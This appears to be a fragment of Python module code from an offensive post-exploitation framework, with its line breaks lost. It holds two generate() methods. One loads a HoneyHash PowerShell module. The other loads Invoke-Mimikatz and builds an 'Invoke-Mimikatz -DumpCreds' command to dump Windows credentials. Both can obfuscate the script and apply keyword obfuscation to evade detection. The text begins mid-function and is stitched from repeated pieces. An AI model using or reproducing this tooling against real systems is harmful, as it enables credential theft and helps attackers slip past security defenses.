return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/management/New-HoneyHash.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode scriptEnd = "New-HoneyHash" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script
def generate(self, obfuscate=False, obfuscationCommand=""): # read in the common module source code moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand) moduleSource = moduleSource.replace("module_source", "obfuscated_module_source") try: f = open(moduleSource, 'r') except: print( helpers.color("[!] Could not read module source path at: " + str(moduleSource))) return "" moduleCode = f.read() f.close() script = moduleCode # build the dump command with whatever options we want scriptEnd = "Invoke-Mimikatz -DumpCreds;" for option, values in self.options.items(): if option.lower() != "agent": if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str( values['Value']) if obfuscate: scriptEnd = helpers.obfuscate( self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd script = helpers.keyword_obfuscation(script) return script